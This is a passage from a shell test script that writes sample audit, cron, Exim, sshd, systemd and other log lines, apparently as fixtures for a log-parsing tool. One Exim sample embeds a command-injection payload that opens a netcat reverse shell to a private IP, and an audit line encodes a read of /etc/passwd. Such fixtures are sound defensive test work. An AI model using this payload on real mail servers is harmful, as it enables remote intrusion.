ocomm=\"sleep\"" >> $LOGFILE echo 'audispd: type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'audispd: type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_LOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_REMOTE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ACCT_UNLOCK_TIMED msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ALERT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_ANOMALY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_EXEC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_HALT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_KILL_PROC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SEBOOL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_SINGLE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_ACCESS msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=RESP_TERM_LOCK msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_ASSIGN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_MODIFY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=ROLE_REMOVE msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SELINUX_ERR msg=audit(1311948547.151:138): op=security_compute_av reason=bounds scontext=system_u:system_r:anon_webapp_t:s0-s0:c0,c100,c200 tcontext=system_u:object_r:security_t:s0 tclass=dir perms=ioctl,read,lock" >> $LOGFILE echo "audispd: type=SERVICE_START msg=audit(1450876900.115:30): pid=1 uid=0 auid=4294967295 
ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SERVICE_STOP msg=audit(1450876900.115:31): pid=1 uid=0 auid=4294967295 ses=4294967295 msg=' comm=\"Serv-U\" exe=\"/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'" >> $LOGFILE echo "audispd: type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "audispd: type=SOCKETCALL msg=audit(1134642541.683:201): nargs=3 a0=10 a1=3 a2=9" >> $LOGFILE echo 'audispd: type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo "audispd: type=SYSTEM_BOOT msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_RUNLEVEL msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=SYSTEM_SHUTDOWN msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TRUSTED_APP msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=TTY msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_ACCT msg=audit(1234877011.795:7732): user pid=26127 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/sbin/sshd\" (hostname=jupiter.example.com, addr=192.168.2.100, terminal=ssh res=success)'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403184.143:1834): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=failed'" >> $LOGFILE 
echo "audispd: type=USER_AUTH msg=audit(1451403193.995:1835): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=USER_AVC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_CHAUTHTOK msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_CMD msg=audit(1450785575.705:3316357): user pid=21619 uid=0 auid=526 msg='cwd=\"/home/hi\" cmd=\"/bin/bash\" (terminal=pts/0 res=success)'" >> $LOGFILE echo "audispd: type=USER_END msg=audit(1450767601.813:3296218): user pid=15764 uid=0 auid=0 msg='PAM: session close acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_ERR msg=audit(1450770602.157:3300444): user pid=16643 uid=0 auid=4294967295 msg='PAM: bad_ident acct="?" : exe=\"/usr/sbin/sshd\" (hostname=111.111.211.38, addr=111.111.211.38, terminal=ssh res=failed)'" >> $LOGFILE echo "audispd: type=USER_LABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_LOGIN msg=audit(1450770603.209:3300446): user pid=16649 uid=0 auid=4294967295 msg='acct=\"root\": exe=\"/usr/sbin/sshd\" (hostname=?, addr=11.111.53.58, terminal=sshd res=failed)'" >> $LOGFILE echo "audispd: type=USER_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MAC_POLICY_LOAD msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MGMT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_ROLE_CHANGE msg=audit(1280266360.845:51): user pid=1978 uid=0 auid=500 subj=system_u:system_r:local_login_t:s0-s0:c0.c1023 msg='pam: default-context=user_u:system_r:unconfined_t:s0 selected-context=user_u:system_r:unconfined_t:s0: exe=\"/bin/login\" (hostname=?, addr=?, terminal=tty1 res=success)'" >> $LOGFILE echo "audispd: 
type=USER_SELINUX_ERR msg=audit(1311948547.151:138): Text" >> $LOGFILE echo "audispd: type=USER_START msg=audit(1450771201.437:3301540): user pid=16878 uid=0 auid=0 msg='PAM: session open acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_TTY msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_UNLABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USYS_CONFIG msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_CONTROL msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_MACHINE_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_RESOURCE msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audisp-remote: queue is full - dropping event" >> $LOGFILE echo "audispd: queue is full - dropping event" >> $LOGFILE echo "audispd: type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE ;; CronParsingModel) echo "CRON[25537]: (root) CMD ping 8.8.8.8" > $LOGFILE echo "CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)" >> $LOGFILE echo "CRON[12461]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)" >> $LOGFILE echo "CRON[12460]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "CRON[13229]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! 
-d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)" >> $LOGFILE echo "CRON[14368]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)" >> $LOGFILE ;; EximGenericParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE # following examples are covering exim failure message types. The examples are taken from # https://forums.cpanel.net/resources/reading-and-understanding-the-exim-main_log.383/ echo "2014-09-29 21:27:08 1XYdJu-002e6P-9F SMTP error from remote mail server after MAIL FROM: SIZE=6601: host mta5.am0.yahoodns.net [66.196.118.240]: 421 4.7.0 [GL01] Message from (184.171.253.133) temporarily deferred - 4.16.50. 
Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html" >> $LOGFILE echo "2020-04-28 22:08:03 1m1x23-2011cZ-MN H=mta7.am0.yahoodns.net [67.195.228.106]: SMTP error from remote mail server after pipelined MAIL FROM: SIZE=1758: 421 4.7.0 [TSS04] Messages from 184.171.253.133 temporarily deferred due to unexpected volume or user complaints - 4.16.55.1; see https://postmaster.verizonmedia.com/error-codes" >> $LOGFILE echo "2014-09-12 08:01:12 1XSLn4-003Fa1-OX SMTP error from remote mail server after end of data: host gmail-smtp-in.l.google.com [173.194.66.27]: 421-4.7.0 [77.69.28.195 15] Our system has detected an unusual rate of\n421-4.7.0 unsolicited mail originating from your IP address. To protect our\n421-4.7.0 users from spam, mail sent from your IP address has been temporarily\n421-4.7.0 rate limited. Please visit\n421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk\n421 4.7.0 Email Senders Guidelines. q4si1448293wij.85 - gsmtp" >> $LOGFILE echo "2014-09-18 13:44:19 1XUb4M-000v5R-6R SMTP error from remote mail server after MAIL FROM: SIZE=1811: host mta7.am0.yahoodns.net [66.66.66.66]: 421 4.7.1 [TS03] All messages from 5.196.113.212 will be permanently deferred; Retrying will NOT succeed. 
See http://postmaster.yahoo.com/421-ts03.html" >> $LOGFILE echo "TO:: host mx.someaddress.com [20.20.20.20]: 450 4.7.1 Client host rejected: cannot find your hostname, [20.20.20.20] 2014-09-21 16:06:05 1XUKFa-0003bb-EM ** someone@someaddress>: retry timeout exceeded" >> $LOGFILE echo "2014-10-10 10:25:01 1XcKLM-003IGU-Fr SMTP error from remote mail server after RCPT TO:: host pro-mail-mx-002.bol.com [20.20.20.20]: 450 4.7.1 Service unavailable" >> $LOGFILE echo "2014-09-24 12:59:49 1XWqqy-00028x-FK == test@badluckbryan.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host gylsystems.com [69.69.69.69]: 451 Temporary local problem - please try later" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (mail.fictional.example) [::1]:49956 sender verify defer for : require_files: error for /home/aaron/etc/domain.com: Permission denied" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (srv-hs1.netsons.net) [::1]:49956 F= A=dovecot_login:aaron@domain.com temporarily rejected RCPT : Could not complete sender verify" >> $LOGFILE echo "2014-09-13 11:37:53 1XSdCz-00049U-5A ==aaron@domain.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host mail.fictional.example [10.5.40.204]: 452 Domain size limit exceeded" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PX-0006SC-Qa ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after RCPT TO:: host mail.domain.com [10.5.40.204]: 550-Verification for \n550-The mail server could not deliver mail to garfield@domain.com. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries.\n550 Sender verify failed" >> $LOGFILE echo "SMTP error from remote mail server after RCPT TO:: host mail.fictional.example[10.5.40.204]: 550-Sender has no A, AAAA, or MX DNS records. mail.fictional.example\n550 l mail.fictional.example\nVerify the zone file in /etc/named for the correct information. 
If it appear correct, you can run named-checkzone domain.com domain.com.db to verify if named is able to load the zone." >> $LOGFILE echo "Diagnostic-Code: X-Postfix; host mail1.domain.com [10.5.40.204] said: 550 5.7.1 Message rejected due to content restrictions (in reply to end of DATA command)\nWhen you see an error such as 550 5.7.1" >> $LOGFILE echo "Final-Recipient: rfc822;aaron@domain.com\nAction: failed\nStatus: 5.5.0\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\n550-mail.fictional.example [10.5.40.204]:58133 is not permitted to relay 550 through this server without authentication." >> $LOGFILE echo "DHE-RSA-AES256-SHA:256: SMTP error from remote mail server after MAIL FROM: SIZE=1834: host mail.fictional.example [10.5.40.204..212]: 550 \"REJECTED - Bad HELO - Host impersonating [mail.fictional2.example]\"" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PY-0006SO-GS <= <> R=1XO5PX-0006SC-Qa U=mailnull P=local S=1951 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com" >> $LOGFILE echo "SMTP error from remote mail server after MAIL FROM:: host mail.fictional.example [10.5.40.204]: 553 sorry, your domain does not exists." >> $LOGFILE echo "2014-11-26 10:26:32 1XtYro-004Ecv-65 ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after MAIL FROM: SIZE=1604: host mail.fictional.example [10.5.40.204]: 553 unable to verify address\nVerify that SMPT authentication has been enabled." 
>> $LOGFILE echo "[15:03:30 hosts5 root /var/log]cPs# grep 1XeRdP-0006JC-FO exim_mainlog 2014-10-15 12:41:11 1XeRdP-0006JC-FO <= <> R=1XeRdF-0006HI-EY U=mailnull P=local S=5445 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com 2014-10-15 12:41:11 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1XeRdP-0006JC-FO 2014-10-15 12:42:12 1XeRdP-0006JC-FO ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after end of data: host mail.fictional.example [10.5.40.204]: 554 rejected due to spam content" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS H=mail.fictional.example [10.5.40.204]:4779 Warning: \"SpamAssassin as marka22 detected message as spam (11.0)\"" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS <=10.5.40.204 H=mail.fictional.example[10.5.40.204]:4779 P=esmtp S=491878 id=dos45yx4zbmri7f@domain.com T="Payment confirmation: 7037487121" for aaron@domain.net [" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS => aaron R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS Completed 2014-10-01 15:30:35 1XZKvG-0002HW-ML H=(12-12-12-12.domain.net [10.5.40.204]:65376 Warning: \"SpamAssassin as marka22 detected message as spam (7.2)\"" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML <= item@something.net H=(12-12-12-12.domain.net [10.5.40.204]:65376 P=esmtp S=519381 id=dos45yx4zbmri7f@domain.com T=\"Payment confirmation: 7037487121\" for mark@domain.com 2014-10-01 15:30:35 1XZKvG-0002HW-ML => mark R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML Completed" >> $LOGFILE echo "2014-09-10 13:06:55 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: \"SpamAssassin as cpaneleximscanner 
detected OUTGOING smtp message as NOT spam (-0.1)\"" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG <= bob@bob.com H=mail.fictional.example [10.5.40.204]:46793 P=esmtpsa X=TLSv1:AES128-SHA:128 A=dovecot_login:aaron@domain.com S=18635 T=\"14\\\" plates\" for live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG SMTP connection outbound 1410368816 1XRlM6-003yMv-KG domain.com live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:07:22 1XRlM6-003yMv-KG => live@somedomain.com R=dkim_lookuphost T=dkim_remote_smtp H=mail.fictional.example [10.5.40.204] X=TLSv1:DHE-RSA-AES256-SHA:256 C=\"250 OK id=1XRlMC-0006w5-F4\" 2014-09-10 13:07:22 1XRlM6-003yMv-KG Completed" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: \"SpamAssassin as sfgthib detected message as spam (998.0)\" 2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR <= cpaneltest@gmail.com H=mail.fictional.example [10.5.40.204]:42603 P=esmtps X=TLSv1:RC4-SHA:128 S=3411 id=CAPtYmmQYRDb38yTmnA_ULZVjnKVOdtu6yw-HapGmjBCAk6rYYw@mail.gmail.com T=\"test\" for aaron@domain.com" >> $LOGFILE ;; KernelMsgParsingModel) echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" > $LOGFILE echo "kernel: martian source 192.168.1.255 from 192.168.1.251, on dev eth3" >> $LOGFILE echo "kernel: ll header: ff:ff:ff:ff:ff:ff:00:18:f8:0e:81:93:08:00" >> $LOGFILE echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff 00 50 56 ad 59 09 08 00 .......PV.Y..." >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff a6 2c 90 bb 31 e9 08 06 .......,..1..." 
>> $LOGFILE ;; NtpParsingModel) echo "ntpd[8457]: Listen and drop on 0 v6wildcard [::]:123" > $LOGFILE echo "ntpd[8457]: Listen and drop on 1 v4wildcard 0.0.0.0:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 2 lo 127.0.0.1:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 3 eth0 1.2.2.19:123" >> $LOGFILE echo "ntpd[8457]: Listening on routing socket on fd #20 for interface updates" >> $LOGFILE echo "ntpd[21152]: logging to file /var/log/ntplog" >> $LOGFILE echo "ntpd[22760]: Soliciting pool server 78.41.116.113" >> $LOGFILE echo "ntpd[23165]: ntpd 4.2.8p12@1.3728-o (1): Starting" >> $LOGFILE echo "ntpd[23165]: Command line: ntpd" >> $LOGFILE echo "ntpd[23165]: must be run as root, not uid 1000" >> $LOGFILE echo "ntpd[23170]: proto: precision = 0.045 usec (-24)" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): good hash signature" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): loaded, expire=2021-12-28T00:00:00Z last=2017-01-01T00:00:00Z ofs=37" >> $LOGFILE echo "ntpd[23170]: unable to bind to wildcard address :: - another process may be running - EXITING" >> $LOGFILE ;; RsyslogParsingModel) echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.4.2\" x-pid=\"1812\" x-info=\"http://www.rsyslog.com\"] rsyslogd was HUPed" > $LOGFILE echo "rsyslogd0: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/0 ]" >> $LOGFILE echo "rsyslogd-2359: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/2359 ]" >> $LOGFILE echo "rsyslogd-2007: action 'action 17' suspended, next retry is Sun May 24 06:56:28 2015 [try http://www.rsyslog.com/e/2007 ]" >> $LOGFILE echo "rsyslogd: rsyslogd's groupid changed to 109" >> $LOGFILE echo "rsyslogd: rsyslogd's userid changed to 104" >> $LOGFILE echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"28018\" x-info=\"https://www.rsyslog.com\"] start" >> $LOGFILE 
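# Remaining sample lines of the RsyslogParsingModel branch (the branch opens above).
  echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"542\" x-info=\"https://www.rsyslog.com\"] rsyslogd was HUPed" >> "$LOGFILE"
  echo "rsyslogd-2222: command 'KLogPermitNonKernelFacility' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? [v8.16.0 try http://www.rsyslog.com/e/2222 ]" >> "$LOGFILE"
  ;;
SshdParsingModel)
  # Mix of successful/failed password, publickey and certificate logins, brute-force
  # lockouts, debug chatter and host-key errors.
  echo "sshd[35618]: Server listening on 0.0.0.0 port 22." > "$LOGFILE"
  echo "sshd[35619]: Failed password for someuser from 1.1.1.1 port 1372 ssh2" >> "$LOGFILE"
  echo "sshd[35619]: Accepted password for someuser from 1.1.1.1 port 1372 ssh2" >> "$LOGFILE"
  echo "sshd[36108]: Accepted publickey for someuser from 1.1.1.2 port 51590 ssh2" >> "$LOGFILE"
  echo "sshd[54798]: error: maximum authentication attempts exceeded for root from 122.121.51.193 port 59928 ssh2 [preauth]" >> "$LOGFILE"
  echo "sshd[54798]: Disconnecting authenticating user root 122.121.51.193 port 59928: Too many authentication failures [preauth]" >> "$LOGFILE"
  echo "sshd[5197]: Accepted publickey for fred from 192.0.2.60 port 59915 ssh2: RSA SHA256:5xyQ+PG1Z3CIiShclJ2iNya5TOdKDgE/HrOXr21IdOo" >> "$LOGFILE"
  echo "sshd[50140]: Accepted publickey for fred from 192.0.2.60 port 44456 ssh2: ECDSA-CERT SHA256:qGl9KiyXrG6mIOo1CT01oHUvod7Ngs5VMHM14DTbxzI ID foobar (serial 9624) CA ED25519 SHA256:fZ6L7TlBLqf1pGWzkcQMQMFZ+aGgrtYgRM90XO0gzZ8" >> "$LOGFILE"
  echo "sshd[5104]: Accepted publickey for fred from 192.0.2.60 port 60594 ssh2: RSA e8:31:68:c7:01:2d:25:20:36:8f:50:5d:f9:ee:70:4c" >> "$LOGFILE"
  echo "sshd[252]: Connection closed by authenticating user fred 192.0.2.60 port 44470 [preauth]" >> "$LOGFILE"
  echo "sshd[90593]: fatal: Timeout before authentication for 192.0.2.60 port 44718" >> "$LOGFILE"
  echo "sshd[252]: error: Certificate invalid: expired" >> "$LOGFILE"
  echo "sshd[90593]: error: Certificate invalid: not yet valid" >> "$LOGFILE"
  echo "sshd[98884]: error: Certificate invalid: name is not a listed principal" >> "$LOGFILE"
  echo "sshd[2420]: cert: Authentication tried for fred with valid certificate but not from a permitted source address (192.0.2.61)." >> "$LOGFILE"
  echo "sshd[2420]: error: Refused by certificate options" >> "$LOGFILE"
  echo "sshd[26299]: Failed none for fred from 192.0.2.60 port 47366 ssh2" >> "$LOGFILE"
  echo "sshd[26299]: User child is on pid 21613" >> "$LOGFILE"
  echo "sshd[21613]: Changed root directory to \"/home/fred\"" >> "$LOGFILE"
  echo "sshd[21613]: subsystem request for sftp" >> "$LOGFILE"
  echo "sshd[83709]: packet_write_poll: Connection from 192.0.2.97 port 57608: Host is down" >> "$LOGFILE"
  echo "sshd[9075]: debug1: Got 100/147 for keepalive" >> "$LOGFILE"
  echo "sshd[73960]: debug2: channel 0: request keepalive@openssh.com confirm 1" >> "$LOGFILE"
  echo "sshd[73960]: debug3: send packet: type 98" >> "$LOGFILE"
  echo "sshd[73960]: debug3: receive packet: type 100" >> "$LOGFILE"
  echo "sshd[73960]: debug1: Got 100/22 for keepalive" >> "$LOGFILE"
  echo "sshd[15780]: debug1: do_cleanup" >> "$LOGFILE"
  echo "sshd[48675]: debug1: session_pty_cleanup: session 0 release /dev/ttyp0" >> "$LOGFILE"
  echo "sshd[29235]: error: Authentication key RSA SHA256:jXEPmu4thnubqPUDcKDs31MOVLQJH6FfF1XSGT748jQ revoked by file /etc/ssh/ssh_revoked_keys" >> "$LOGFILE"
  echo "sshd[38594]: Invalid user ubnt from 201.179.249.231 port 52471" >> "$LOGFILE"
  echo "sshd[38594]: Failed password for invalid user ubnt from 201.179.249.231 port 52471 ssh2" >> "$LOGFILE"
  echo "sshd[38594]: error: maximum authentication attempts exceeded for invalid user ubnt from 201.179.249.231 port 52471 ssh2 [preauth]" >> "$LOGFILE"
  echo "sshd[38594]: Disconnecting invalid user ubnt 201.179.249.231 port 52471: Too many authentication failures [preauth]" >> "$LOGFILE"
  echo "sshd[93126]: Failed none for invalid user admin from 125.64.94.136 port 27586 ssh2" >> "$LOGFILE"
  echo "sshd[9265]: Accepted password for fred from 127.0.0.1 port 40426 ssh2" >> "$LOGFILE"
  echo "sshd[5613]: Invalid user cloud from ::1 port 57404" >> "$LOGFILE"
  echo "sshd[5613]: Failed password for invalid user cloud from ::1 port 57404 ssh2" >> "$LOGFILE"
  echo "sshd[5613]: Connection closed by invalid user cloud ::1 port 57404 [preauth]" >> "$LOGFILE"
  echo "sshd[3545]: pam_succeed_if(sshd:auth): requirement \"uid >= 1000\" not met by user \"root\"" >> "$LOGFILE"
  echo "sshd[3545]: pam_unix(sshd:session): session opened for user root by (uid=0)" >> "$LOGFILE"
  echo "sshd[3545]: Received disconnect from ::1: 11: disconnected by user" >> "$LOGFILE"
  echo "sshd[3545]: pam_unix(sshd:session): session closed for user root" >> "$LOGFILE"
  echo "sshd[4182]: error: Could not load host key: /etc/ssh/ssh_host_dsa_key" >> "$LOGFILE"
  ;;
SsmtpParsingModel)
  echo "sSMTP[24391]: /usr/sbin/sendmail sent mail for raul" > "$LOGFILE"
  ;;
SuSessionParsingModel)
  echo "su[10710]: Successful su for user by root" > "$LOGFILE"
  echo "su[10710]: + ??? root:user" >> "$LOGFILE"
  echo "su[10710]: pam_unix(su:session): session opened for user user by (uid=0)" >> "$LOGFILE"
  echo "su[10710]: pam_unix(su:session): session closed for user user" >> "$LOGFILE"
  ;;
SyslogPreambleModel)
  # Preamble only; the trailing space is part of the sample.
  echo "Feb 29 00:01:41 mail-0 " > "$LOGFILE"
  echo "Mar 1 06:25:38 mail " >> "$LOGFILE"
  ;;
SystemdParsingModel)
  echo "systemd[1]: phpsessionclean.service: Succeeded." > "$LOGFILE"
  echo "systemd[1]: Finished Clean php session files." >> "$LOGFILE"
  echo "systemd[1]: logrotate.service: Succeeded." >> "$LOGFILE"
  echo "systemd[1]: Finished Rotate log files." >> "$LOGFILE"
  echo "systemd[1]: man-db.service: Succeeded." >> "$LOGFILE"
  echo "systemd[1]: Finished Daily man-db regeneration." >> "$LOGFILE"
  echo "systemd[1]: Finished Ubuntu Advantage APT and MOTD Messages." >> "$LOGFILE"
  echo "systemd[1]: Finished Refresh fwupd metadata and update motd." >> "$LOGFILE"
  echo "systemd[1]: Finished Daily apt download activities." >> "$LOGFILE"
  echo "systemd[1]: Starting Daily apt upgrade and clean activities..." >> "$LOGFILE"
  echo "systemd[1]: Finished Daily apt upgrade and clean activities." >> "$LOGFILE"
  echo "systemd[1]: anacron.service: Killing process 39123 (update-notifier) with signal SIGKILL." >> "$LOGFILE"
  echo "systemd[1]: Starting PackageKit Daemon..." >> "$LOGFILE"
  echo "systemd[1]: Started PackageKit Daemon." >> "$LOGFILE"
  echo "systemd[1]: Reloading." >> "$LOGFILE"
  echo "systemd[2318]: var-lib-docker-overlay2-check\x2doverlayfs\x2dsupport037009939-merged.mount: Succeeded." >> "$LOGFILE"
  echo "systemd[2318]: Started VTE child process 54668 launched by gnome-terminal-server process 2984." >> "$LOGFILE"
  echo "systemd-logind[2445]: New session 2172664 of user dbi_backup." >> "$LOGFILE"
  echo "systemd-logind[760]: Session 230 logged out. Waiting for processes to exit." >> "$LOGFILE"
  echo "systemd-logind[760]: Removed session 230." >> "$LOGFILE"
  echo "systemd-logind[760]: New session 231 of user egoebelbecker." >> "$LOGFILE"
  echo "systemd-logind[467]: Failed to abandon session scope: Transport endpoint is not connected" >> "$LOGFILE"
  ;;
TomcatParsingModel)
  # model is not updated to the latest version and therefore not tested.
  rm "$LOGFILE"
  touch "$LOGFILE"
  ;;
UlogdParsingModel)
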